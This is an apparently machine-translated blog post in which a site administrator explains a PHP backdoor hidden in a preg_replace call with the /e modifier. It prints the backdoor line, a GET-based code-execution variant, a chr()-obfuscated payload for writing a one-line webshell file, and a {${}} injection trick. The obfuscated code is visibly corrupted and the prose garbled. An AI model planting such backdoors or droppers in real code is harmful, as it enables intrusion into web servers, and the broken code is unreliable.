Preg_replace Hidden backdoor and follow-up inquiry

The thing is this, friends of the site using a variety of search back door tools are not found in the PHP Trojan. Always can't find, little black trick is very advanced, each time make

Use finished always to delete the back door, but every time can continue to come in, always can't find from where. This really makes the human egg ache.

Later, finally found traces in the log, through my analysis, I found an IP is always very strange post data to a file. and then some

Time, this IP access to a strange strange file, the name is obviously not normal system files, but PHP back door. But soon after use, the back door

was deleted.

Haha, met little black is very careful.

Then through the analysis found that little black access to the file found code:

The code is as follows	Copy Code
@preg_replace ("//e", $_post[' In_comsenz '), "Access Denied");

If you see this code is not a problem, but this is the small black hidden malicious code and backdoor. Hide it, basically any

Killing software can not be detected.

Preg_replace function Prototype:

Mixed preg_replace (mixed pattern, mixed replacement, mixed subject [, int limit])

Special Note:

The/e modifier causes preg_replace () to use the replacement parameter as PHP code (after replacing the appropriate reverse reference). Tip: To ensure that

Replacement constitutes a valid PHP code string, otherwise PHP will have a syntax resolution error in the row containing preg_replace ()

Miss.

The above code is the post to accept the data to test, more trouble, if you change to get data ...

Example:

The code is as follows	Copy Code
Echo preg_replace ("/test/e", $_get["H"], "jutst test");

If we submit a h=phpinfo (), phpinfo () will be executed (using the/e modifier, preg_replace will use the replacement parameter as PHP

Code execution).

If we were to post, what would we do if we tested the following code?

The code is as follows

Copy Code

Chr (102). CHR (112). CHR (117). chr (116). chr (h=eval). chr (CHR). 102. chr (CHR). 112 (a). chr (CHR). Chr (a). Chr (a). Chr (a). chr (116). Chr (in). Chr (a). Chr (a). Chr (a). chr (112). Chr (a). chr (112). Chr (M). chr (CHR). chr (119). Chr (a). Chr (a). Chr (a). Chr (a). chr (CHR). chr (CHR). chr (112). Chr (a). Chr (118). Chr (in). Chr (108). Chr (a). Chr (a). chr (km). chr (CHR). chr (CHR). CHR (109). Chr (a). chr (M). Chr (a). Chr (a). Chr (a). Chr (59)).

The text corresponding to the ciphertext is:

The code is as follows	Copy Code
Fputs (fopen (data/a.php,w),);

The result of the execution is to generate a one-word trojan file a.php in the/data/directory.

This is scary ....

One more difficult example:

View Code printing?

The code is as follows	Copy Code
? function test ($STR) { } Echo preg_replace ("/s*[php]" (. +?) [/php]s*/ies ", ' Test (" 1 ") ', $_get[" H "]); ?>

Submit? H=[php]phpinfo () [/php],phpinfo () will be executed?

Certainly not. Because after a regular match, the replacement parameter becomes ' Test (' phpinfo '), at which point Phpinfo is only used as a string parameter

counted.

Is there any way to make it run?

Of course. Here we will be executed if we submit the H=[php]{${phpinfo ()}}[/php],phpinfo (). Why, then?

In PHP, if a variable is included in a double quote, the PHP interpreter replaces it with the result of the variable interpretation; the variable in single quotes is not processed.

Note: The functions in double quotes are not executed and replaced.

Here we need to construct a special variable with {${}}, ' Test (' {${phpinfo ()}} ') ' To get the function executed

(${phpinfo ()} will be interpreted for execution).

The following tests can be done first:

echo "{${phpinfo ()}}"; The phpinfo will be executed successfully.

So, when you look in the back door, look under.

OK, say so much, also understand, the above I give the code:

The code is as follows	Copy Code
1 @preg_replace ("//e", $_post[' In_comsenz '), "Access Denied");

The seemingly normal code, in fact, is an extremely dangerous code, hidden quite deep ah